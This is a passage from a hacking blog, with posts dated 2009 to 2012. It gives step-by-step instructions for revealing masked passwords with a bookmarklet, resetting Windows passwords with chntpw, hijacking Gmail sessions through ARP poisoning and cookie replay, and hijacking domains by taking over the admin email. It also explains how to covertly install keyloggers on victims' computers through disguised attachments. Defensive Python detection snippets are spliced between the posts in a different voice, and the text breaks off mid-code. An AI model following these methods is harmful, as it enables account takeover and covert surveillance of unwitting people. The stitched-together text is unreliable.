Showing posts with label HACK.

Jun 16, 2012

Reveal the dotted password

You might have seen that the password you enter is displayed as asterisks (*) or as dots on almost every login page on the internet. This is because the designers of login screens hide the text inside the password field, rendering it as stars or dots so that the password cannot be read over the shoulder of the account owner while logging in. The masking is purely visual: the field still holds the password in plain text, and any script that runs in the page can read it.

But here is a trick to read the hidden password inside the password field of a login page, or of any other page. It is based on a JavaScript snippet which extracts the value from every password field and displays it in a dialog box as plain text.

To read the password inside the password field as text, enter the following into the address bar of the login page and press Enter. Make sure the login page has a password entered in its password field.

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k < w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i < f.length;i++) {var e=f[i].elements;for(var j=0;j < e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found, THANX TO LETHALTRIX ', s)}else{alert('Password is blank')}return true;}}


COPY THE JAVASCRIPT ABOVE AND PASTE IT IN THE ADDRESS BAR OF THE PAGE CONTAINING THE DOTTED OR STARRED PASSWORD... DONE :)
(Current browsers strip the "javascript:" prefix from text pasted into the address bar; retype that prefix by hand, or save the snippet as a bookmarklet instead.)

Feb 10, 2012

Change Windows Login Password using Ubuntu Live CD


If you forgot your Windows login password, or if you want to look into the password-protected Windows account of your son, here is a method :). A small Windows login hacking tutorial just for the LethalTrix readers. This method works for all of the NT-based versions of Windows, anything from Windows 2000 and later, basically. And yes, that includes Windows 7 and Windows XP.
Note: If you have files on your hard disk encrypted using the built-in Windows encryption (EFS), they may not be accessible after changing the Windows password using this method, because the key that protects them is derived from the account password. Exercise caution if you have important encrypted files.
You'll need an Ubuntu Live CD or a bootable Ubuntu flash drive. You can create a bootable flash drive using the Startup Disk Creator app in Ubuntu (or you can use software such as UNetbootin or LiLi USB Creator in Windows).
The program that lets us manipulate Windows passwords is called chntpw. The steps to install it differ between the 32-bit and 64-bit versions of Ubuntu (you need an internet connection to download it).
Installation: 32-bit
Open up Synaptic Package Manager by typing Synaptic into the Unity search in Ubuntu 11.4 or higher, or, in older versions, by clicking on System at the top of the screen, expanding the Administration section, and clicking on Synaptic Package Manager.

chntpw is found in the universe repository. Repositories are a way for Ubuntu to group software together so that users are able to choose if they want to use only completely open source software maintained by Ubuntu developers, or branch out and use software with different licenses and maintainers.
To enable software from the universe repository, click on Settings > Repositories in the Synaptic window.
Add a checkmark beside the box labeled “Community-maintained Open Source software (universe)” and then click close.
When you change the repositories you are selecting software from, you have to reload the list of available software. In the main Synaptic window, click on the Reload button.
The software lists will be downloaded.
Once downloaded, Synaptic must rebuild its search index. The label over the text field by the Search button will read “Rebuilding search index.” When it reads “Quick search,” type chntpw in the text field. The package will show up in the list.
Click on the checkbox near the chntpw name. Click on Mark for Installation.
chntpw won’t actually be installed until you apply the changes you’ve made, so click on the Apply button in the Synaptic window now.
You will be prompted to accept the changes. Click Apply.
The changes should be applied quickly. When they’re done, click Close.
chntpw is now installed! You can close Synaptic Package Manager. Skip to the section titled Using chntpw to reset your password.
Installation: 64-bit
The version of chntpw available in Ubuntu’s universe repository will not work properly on a 64-bit machine. Fortunately, a patched version exists in Debian’s Unstable branch, so let’s download it from there and install it manually.
Open Firefox. Whether it’s your preferred browser or not, it’s very readily accessible in the Ubuntu Live CD environment, so it will be the easiest to use. There’s a shortcut to Firefox in the top panel.
Navigate to http://packages.debian.org/sid/amd64/chntpw/download and download the latest version of chntpw for 64-bit machines.
Note: In most cases it would be best to add the Debian Unstable branch to a package manager, but since the Live CD environment will revert to its original state once you reboot, it’ll be faster to just download the .deb file.
Save the .deb file to the default location.
You can close Firefox if desired. Open a terminal window by pressing Alt+Ctrl+T

In the terminal window, enter the following text, hitting enter after each line:
cd Downloads
sudo dpkg -i chntpw*
chntpw will now be installed.
Using chntpw to reset your password
Before running chntpw, you will have to mount the hard drive that contains your Windows installation. In most cases, Ubuntu 9.10 makes this simple.
Click on Places at the top-left of the screen. If your Windows drive is easily identifiable – usually by its size – then left click on it.
If it is not obvious, then click on Computer and check out each hard drive until you find the correct one.
The correct hard drive will have the WINDOWS folder in it. When you find it, make a note of the drive’s label that appears in the menu bar of the file browser.
If you don’t already have one open, start a terminal window by going to Applications > Accessories > Terminal.

In the terminal window, enter the commands
cd /media
ls
pressing enter after each line. You should see one or more strings of text appear; one of those strings should correspond with the string that appeared in the title bar of the file browser earlier.
Change to that directory by entering the command
cd <hard drive label>
Since the hard drive label will be very annoying to type in, you can use a shortcut by typing in the first few letters or numbers of the drive label (capitalization matters) and pressing the Tab key. It will automatically complete the rest of the string (if those first few letters or numbers are unique).
We want to switch to a certain Windows directory. Enter the command:
cd WINDOWS/system32/config/
Again, you can use tab-completion to speed up entering this command.
To change or reset the administrator password, enter:
sudo chntpw SAM
SAM is the registry hive that holds the local account database, including the password hashes. You will see some text appear, including a list of all of the users on your system.
At the bottom of the terminal window, you should see a prompt that begins with “User Edit Menu:” and offers four choices. We recommend that you clear the password to blank (you can always set a new password in Windows once you log in). To do this, enter “1” and then “y” to confirm.
If you would like to change the password instead, enter “2”, then your desired password, and finally “y” to confirm.
If you would like to reset or change the password of a user other than the administrator, enter:
sudo chntpw -u <username> SAM
From here, you can follow the same steps as before: enter “1” to reset the password to blank, or “2” to change it to a value you provide.
And that’s it!
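The "find the right mount" step above relies on tab completion and on spotting a WINDOWS folder by eye. The added Python example below (my own, not from the original post) turns it into a check: it walks a list of mount points such as the entries under /media, matches the Windows/System32/config path case-insensitively (the folder may be spelled WINDOWS, Windows or windows depending on the version that created it), and reports whether the SAM hive is present. The mount names in demo() are constructed. The function only ever sees directories, so a volume protected by BitLocker or similar full-disk encryption is simply reported as holding no Windows install, which is also the mitigation against this whole procedure.

```python
import os
import tempfile

# Path components compared case-insensitively, since Windows names are case-
# insensitive but an NTFS volume mounted on Linux is not.
WINDOWS_CONFIG_PATH = ["windows", "system32", "config"]


def find_windows_config(mount_roots):
    """Return the first <mount>/Windows/System32/config directory under the
    given mount points, or None if no mount holds a Windows installation."""
    for root in mount_roots:
        path = root
        for component in WINDOWS_CONFIG_PATH:
            try:
                entries = os.listdir(path)
            except OSError:            # unreadable, encrypted, or not a directory
                path = None
                break
            match = next((e for e in entries if e.lower() == component), None)
            if match is None:
                path = None
                break
            path = os.path.join(path, match)
        if path is not None:
            return path
    return None


def sam_hive_present(config_dir):
    """True if the config directory contains the SAM hive (any letter case)."""
    if config_dir is None:
        return False
    return any(e.lower() == "sam" for e in os.listdir(config_dir))


def demo():
    """Build a constructed /media-like layout in a temp dir and run the checks.
    Returns (basename of the directory found, whether SAM was present,
    result for a mount with no Windows install)."""
    with tempfile.TemporaryDirectory() as media:
        data_disk = os.path.join(media, "DATA")              # constructed: no Windows here
        win_disk = os.path.join(media, "3A2F1B4C5D6E7F80")   # constructed volume label
        os.makedirs(data_disk)
        config = os.path.join(win_disk, "WINDOWS", "system32", "config")
        os.makedirs(config)
        open(os.path.join(config, "SAM"), "wb").close()      # empty stand-in for the hive
        found = find_windows_config([data_disk, win_disk])
        return (os.path.basename(found) if found else None,
                sam_hive_present(found),
                find_windows_config([data_disk]))


if __name__ == "__main__":
    print(demo())
```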
chntpw is a very useful utility provided for free by the open source community. It may make you think twice about how secure the Windows login system is, but knowing how to use chntpw can save your tail if your memory fails you two or eight times!

Sep 7, 2010

HACKING GMAIL USING GX SCRIPT


Introduction


Hacking web applications has always fascinated script kiddies, and hacking a free web email account is every geek's first attempt. The method I will describe in this post is not new; the same method applies to Yahoo and other free web email services too.

The method we will be using is cookie stealing: capturing a session cookie and replaying it back to the Gmail server. There are many ways to steal a cookie, one of them being XSS (cross-site scripting). But we won't be using XSS here; in our attack we will use local tools to sniff the cookie off the network and then use that cookie to get access to the Gmail account.

Assumption:
You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
You know basic networking.

Tool used for this attack:
Cain & Abel
Network Miner
Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,
If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

A switch forwards unicast traffic only to the port where the destination lives. When X and Y are communicating with each other on a switched network, Z does not get to see what X and Y are saying, so in order to sniff that communication you would have to poison the ARP table for X and Y. On wireless you don't have to do poisoning, because a wireless access point behaves like a hub, forwarding any communication to all of its recipients.
Start Cain from Start > Program > Cain > Cain
Click on the Start/Stop Sniffer tool icon in the tool bar. We will first scan the network to see which IPs are in use; this list will also help us to launch an attack on the victim.
Then click on the Sniffer tab, then the Hosts tab below. Right-click within that spreadsheet and click on Scan MAC Addresses; from the Target section select
All hosts in my subnet and then press OK. This will list all hosts connected to your network. You will notice that your own machine's physical IP is not in that list.
How to check your physical IP?
> Click on Start > Run, type cmd and press Enter. In the command prompt type
ipconfig and press Enter. This shows the IP address assigned to your PC.
It will have the following output (screenshot of ipconfig not reproduced here).

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

Click on Configure > APR > Use Spoofed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.
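What Cain's APR does on the wire is visible to anyone else watching ARP on the same segment, which is how tools in the arpwatch family catch it. The following added Python example (my own, not part of the post) runs the two classic checks over a constructed sequence of ARP replies that mirrors the post's addresses: an IP whose MAC changes (or disagrees with a trusted baseline such as the gateway's real MAC), and one MAC answering for several IPs. All addresses and MACs are constructed.

```python
from collections import defaultdict

# Constructed ARP replies, in the order a sniffer on the segment would see
# them, as (sender IP, sender MAC). 192.168.1.1 is the gateway, 192.168.1.15
# the victim and 192.168.1.10 the "free" address the attacker adopts.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # gateway, genuine
    ("192.168.1.15", "00:11:22:33:44:0f"),  # victim, genuine
    ("192.168.1.10", "00:11:22:33:44:aa"),  # attacker's own spoofed address
    ("192.168.1.1", "00:11:22:33:44:aa"),   # attacker now answers for the gateway
    ("192.168.1.15", "00:11:22:33:44:aa"),  # ...and for the victim
]


def detect_arp_spoofing(replies, trusted=None):
    """Return alert strings for the poisoning patterns in a reply stream.

    trusted: optional {ip: mac} baseline, e.g. the gateway's MAC read from the
    router itself. Heuristics: an IP whose MAC disagrees with the baseline or
    with the first MAC seen for it, and one MAC answering for several IPs.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    first_seen = {}                 # ip -> first mac observed for it
    claimed = defaultdict(set)      # mac -> set of ips it has answered for
    flagged_macs = set()            # report the "many ips" pattern once per mac
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        if ip in trusted and trusted[ip] != mac:
            alerts.append(f"baseline violation: {ip} should be {trusted[ip]}, got {mac}")
        elif ip in first_seen and first_seen[ip] != mac:
            alerts.append(f"ip-mac change: {ip} moved from {first_seen[ip]} to {mac}")
        first_seen.setdefault(ip, mac)
        claimed[mac].add(ip)
        if len(claimed[mac]) > 1 and mac not in flagged_macs:
            flagged_macs.add(mac)
            alerts.append(f"one mac, many ips: {mac} answers for {sorted(claimed[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_ARP_REPLIES,
                                    trusted={"192.168.1.1": "00:11:22:33:44:01"}):
        print(line)
```

In practice the replies come from a sniffer or from polling each host's ARP cache; the baseline check is the strongest of the three because an attacker who poisons early, before the first genuine reply is seen, defeats the "first seen" heuristic. The mitigations are a static ARP entry for the gateway on sensitive hosts and Dynamic ARP Inspection on managed switches.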

B] Using Network Miner to capture cookie in plain text


We are using Network Miner to capture the cookie, but Network Miner can be used for many things: capturing text, images, HTTP parameters and files. Network Miner is normally used in passive reconnaissance to collect the IP, domain and OS fingerprint of the devices talking to your machine. If you don't have Network Miner you can use any other sniffer, such as Wireshark, Iris Network Scanner or NetWitness.

We are using this tool because of its ease of use.

Open Network Miner by clicking its exe (please note it requires the .NET Framework to work).
From the “---Select network adapter in the list---” drop-down click on the down arrow and select your adapter. If you are using a wired Ethernet network then your adapter will have an Ethernet name and the IP address of your machine; if you are using wireless then the adapter name will contain “wireless” and your IP address. Select the one you are using and click on Start.
Important: before you start, make sure you are not browsing any websites or using any instant messaging, and that you have cleared all cookies from Firefox.
Click on the Credentials tab above. This tab captures all HTTP cookies; look closely at the “Host” column and you should see mail.google.com somewhere. If you can locate the mail.google.com entry, right-click the Username column in that same entry and click on “Copy username”, then open Notepad and paste the copied content there.
Turn off Word Wrap in Notepad and search for GX in the line. The captured data will contain many cookies from Gmail, each separated by a semicolon. The GX cookie starts with GX= and ends with a semicolon; copy everything between the = and the semicolon.
Example: GX=axcvb1mzdwkfefv; <- copy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.


Open Firefox and log in your gmail email account.
from firefox click on Tools > cookie Editor.
In the filter box type .google.com and press Filter, and from the list below search for the cookie named GX. If you locate GX, double-click on that GX cookie, then in the content box delete everything and paste the GX cookie you captured in step B, click on Save and then Close.
From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?



Google has provided a way out of this attack: use a secure cookie instead of an insecure one. You can enable this by setting Gmail to always use https, so the session, and with it the cookie, travels only over TLS and never in the clear on the LAN.
Settings > Browser connection > Always use https
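The setting above works because a cookie marked Secure is never attached to a plain-http request, so there is nothing for a LAN sniffer to copy. The added Python example below (mine, not Google's code) parses Set-Cookie headers, reports the missing Secure and HttpOnly attributes, and models the browser's Secure rule. The two headers are constructed and only borrow the GX value used as an illustration earlier in the post; the real Gmail cookie format is not reproduced.

```python
def parse_set_cookie(header_value):
    """Split a Set-Cookie header into (name, value, {attribute: value}).
    Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to ''."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return the findings a defender cares about for a session cookie."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure flag, so the browser also sends it over plain http")
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly flag, so page script (an XSS payload) can read it")
    return findings


def browser_would_send(header_value, request_scheme):
    """Model the Secure rule: a Secure cookie is attached to https requests only."""
    _, _, attrs = parse_set_cookie(header_value)
    return request_scheme == "https" or "secure" not in attrs


# Constructed headers: the first has no protection attributes at all, the
# second is the same cookie with the attributes a hardened deployment sets.
WEAK_COOKIE = "GX=axcvb1mzdwkfefv; Domain=.google.com; Path=/mail"
HARDENED_COOKIE = "GX=axcvb1mzdwkfefv; Domain=.google.com; Path=/mail; Secure; HttpOnly"


if __name__ == "__main__":
    for header in (WEAK_COOKIE, HARDENED_COOKIE):
        print(header)
        for finding in audit_set_cookie(header) or ["ok"]:
            print("  ", finding)
        print("   sent over http:", browser_would_send(header, "http"))
```

Forcing https on the client side is only half of the fix: if the server still issues the cookie without Secure, one stray http link to the same domain leaks it. Both ends need to agree, which is why the server-side attribute and the client-side setting go together.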



Mar 12, 2010

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation wherein we need to gain access to a computer which is password protected, or we forget the administrator password without which it becomes impossible to log in to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, meaning you need to shut down your computer and boot it from a floppy disk, CD or USB device (such as a pen drive). The tool has the following features.


  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked-out or disabled user accounts!
  • There is also a registry editor and other registry utilities that work under Linux/Unix, and can be used for other things than password editing.



How it works?
Most Windows operating systems store the login passwords (in hashed form) and other encrypted passwords in a file called SAM (Security Accounts Manager). This file can usually be found in \windows\system32\config. It is part of the Windows registry and remains inaccessible as long as the OS is active. Hence you need to boot the computer from other media and access the SAM file that way. This tool gains access to the file and will reset/remove the password associated with the administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool, since floppy drives are outdated and don't exist in today's computers. Once you download it you'll get a bootable image which you need to burn onto a CD. Now boot your computer from this CD and follow the on-screen instructions to reset the password.

Another simple way to reset non-administrator account passwords
Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)


2. Now type net user and hit Enter


3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows


4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

Oct 15, 2009

windows password loop hole...




a. ok now, what you need to do is to run compmgmt.msc

b. and click on local users and groups.

c. once you've gotten here you need to open up the 'users' folder.


at this point i am walking along with you and notice that there are several
major security holes dealing specifically with the password:
1. double clicking on the any user name allows you a list that looks
something like this:
"user name"

full name: -----------------------
|__________________|

description: -----------------------
|__________________|
--
|_| user must change password at next logon

--
|_| user cannot change password

--
|/| password never expires

--
|_| account is disabled

--
|_| account is locked out


"ok" "cancel" "apply"

ok if you can get past my cheesy drawing, i must ask, did you notice that
the "password never expires" box is checked? if you did, then you may have
realized that this means that you can also uncheck it!

2. if you're paying attention, you'll see that the 'user must change password
at next logon' box is unchecked. if you put a check in this box of course,
when you shut down the system will prompt for a new password!

3. going back to step c.,
right click on any account and notice the dialog that appears:
set password...
all tasks
delete
rename
properties
help

i think you can handle it from here

ps. i wonder if you can access this data if this stuff is locked to the user
by the admin by going in through the command prompt. i doubt it but if anyone

found pls let me know....


Thanks for fainted brain who gave information on this for me



Sep 30, 2009

DOMAIN HIJACKING


In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet domain names are stolen from their legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to see how domain names are hijacked, it is necessary to understand how domain names operate and how they get associated with a particular web server (website).
The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
What happens when a domain is hijacked
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.
How the domain names are hijacked
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
This information can be obtained from the WHOIS data of the target domain. To access the WHOIS data, go to whois.domaintools.com, enter the target domain name and click on Lookup. Once the WHOIS data is loaded, scroll down and you'll see the Whois Record. Under this you'll find the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record: “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case you don't find this, scroll up and you'll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.
How to protect the domain name from being hijacked
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you lose your domain. So refer to my previous post on how to protect your email account from being hacked. Another good way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for your domain name, he will not be able to find your name, phone and administrative email address. So private registration provides extra security and protects your privacy. Private domain registration costs a bit extra but is really worth it for its advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.
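The WHOIS lookup that gives a hijacker the registrar and the administrative email is the same lookup a domain owner can run to check their own exposure. The added Python example below (not from the original post) parses a WHOIS record into its fields, reports the registrar and whether a real administrative email is visible (a private registration shows a redacted or proxy address instead), and, going one step beyond the post, checks for the clientTransferProhibited status, the registrar lock that blocks a transfer even if the control panel is reached. Both records are constructed; XYZ Company and abc.com are the post's own placeholders, and the privacy-marker word list is a heuristic of mine.

```python
import re

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Heuristic markers that a privacy/proxy service, not a person, is listed.
PRIVACY_MARKERS = ("redacted", "privacy", "proxy", "whoisguard")


def parse_whois(text):
    """Collect 'Key: value' lines into {lowercase key: [values]}; WHOIS repeats
    some keys (e.g. several Domain Status lines), hence the lists."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and value.strip():
            fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


def whois_exposure(text):
    """Summarise what a WHOIS record gives away and what protects the domain."""
    fields = parse_whois(text)
    registrar = None
    for key in ("registration service provided by", "icann registrar", "registrar"):
        if key in fields:
            registrar = fields[key][0]
            break
    admin_email = None
    for key in ("admin email", "administrative contact email", "admin contact email"):
        if key in fields:
            admin_email = fields[key][0]
            break
    exposed = bool(admin_email and EMAIL_RE.fullmatch(admin_email)
                   and not any(m in admin_email.lower() for m in PRIVACY_MARKERS))
    # Status lines may carry a trailing EPP URL; the first token is the status.
    statuses = [s.split()[0].lower() for s in fields.get("domain status", [])]
    return {
        "registrar": registrar,
        "admin_email": admin_email,
        "admin_email_exposed": exposed,
        "transfer_locked": "clienttransferprohibited" in statuses,
    }


# Constructed records. The first is what the post describes: registrar and a
# personal admin mailbox in the open. The second is a private registration.
EXPOSED_RECORD = """\
Domain Name: ABC.COM
Registration Service Provided By: XYZ Company
Domain Status: clientTransferProhibited
Admin Email: john@abc.com
"""

PRIVATE_RECORD = """\
Domain Name: ABC.COM
Registrar: XYZ Company
Admin Email: REDACTED FOR PRIVACY
"""


if __name__ == "__main__":
    for record in (EXPOSED_RECORD, PRIVATE_RECORD):
        print(whois_exposure(record))
```

Run against your own domains, a record that reports admin_email_exposed True or transfer_locked False is the thing to fix at the registrar: enable privacy, turn the transfer lock on, and put a second factor on the mailbox the record names.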

Aug 3, 2009

HOW TO HACK AN EMAIL


The most frequent question asked by many people especially in a chat room is How to Hack an Email Account? So you as the reader are most likely reading this because you want to hack into some one’s email account. Most of the sites on the internet teach you some nonsense and outdated tricks to hack an email. But here are some of the real and working ways that can be used to hack an email account.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING
Before you learn the real ways to hack an email, the following are the things you should be aware of.
1. There is no ready made software that can hack emails just with a click of a button. Please don’t waste your money on such scam softwares.
2. Never trust any hacking service that claims to hack email passwords for just $100 or $200. People often get fooled by these services and eventually lose their money with no gain.
3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other methods are simply scam or don’t work. The following are the only 2 foolproof methods that work.

1. EASIEST WAY TO HACK AN EMAIL ACCOUNT


Today, with the advent of a program called Keylogger it’s just a cakewalk to hack an email account. It doesn’t matter whether or not you have physical access to the victim’s computer. Using a keylogger is the easiest way to hack an email account. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any email account.
1. What is a keylogger?
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific computer’s keyboard. Using a keylogger is the easiest way to hack an email account. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.
2. Where is the keylogger program available?
A keylogger program is widely available on the internet. Some of the best ones are listed below
3. How to install it?

You can install these keyloggers just as any other program but these things you must keep in mind. While installing, it asks you to set a secret password and a hot key combination. This is because, after installation the keylogger program is completely hidden and the victim can no way identify it. So, you need the Hot Key combination and secret password to later unhide the keylogger.
4. Once installed how to get password from it?

The hacker can open the keylogger program by just pressing the hot keys (which is set during installation) and enter the password. Now it shows the logs containing every keystroke of the user,where it was pressed, at what time, including screenshots of the activities. These logs contain the password of the victim’s email account.
5. I don’t have physical access to the victim’s target computer, what can I do?
It doesn’t matter whether or not you have physical access to the victim’s computer. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. These activities are sent to you by the keylogger software via email or FTP.
6. What is the best way to deploy the keylogger onto remote PC?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.
7. How can a keylogger hack the Email password?
Hacking an email password using keylogger is as simple as this: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Email account by typing the username and password. This username and password is recorded and sent to you via Email. Now you have the password of your target email account.
In case if you install the keylogger on your local PC, you can obtain the recorded email password just by unhiding the keylogger program (use your hot key and password to unhide).
8. Which Keylogger is the best?
I recommend SniperSpy as the best for the following reasons.
1. SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista. But Winspy has known compatibility issues with Vista. So if your PC or the remote PC runs Vista then Winspy is not recommended.
2. SniperSpy is more reliable than Win-Spy since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
3. Unlike Winspy, Sniperspy doesn’t require anything to be installed on your computer. To monitor the remote PC all you have to do is just log in to your SniperSpy account from your browser.
4. SniperSpy is easier to use and faster than Winspy.
5. SniperSpy offers better support than WinSpy.


Apart from the above mentioned reasons, both SniperSpy and WinSpy stands head-to-head. However in my opinion it’s better to go for SniperSpy since it is the best one. I have tested tons of keyloggers and the only two that stood up were SniperSpy and Winspy.
So what are you waiting for? If you’re serious to hack an email account then go grab either of the two keyloggers now!
For more information on these two softwares visit the following links

2. OTHER WAYS TO HACK AN EMAIL ACCOUNT


The other most commonly used trick to sniff passwords is using fake login pages. Today, fake login pages are the most widely used technique to hack an email account. A fake login page is a page that appears exactly like a login page, but once we enter our password there, we end up losing it.
Fake login pages are created by many hackers on their sites and appear exactly like the Gmail or Yahoo login pages, but the entered details (username & password) are sent to a remote server and we get redirected to some other page. Many times we ignore this, but in the end we lose our valuable data.
However creating a fake login page and taking it online to successfully hack an email account is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc.
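The tell-tale of the fake login page described above is where the form sends the credentials. The added Python example below (not from the original post) parses a page with the standard library's html.parser, finds every form that contains a password field, resolves its action URL against the page URL, and flags forms that submit to a different host than the page or over plain http. This is the kind of check a mail-security crawler or a browser extension runs; the two pages and all hostnames are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Record every <form> and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                      # valueless attributes map to None
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
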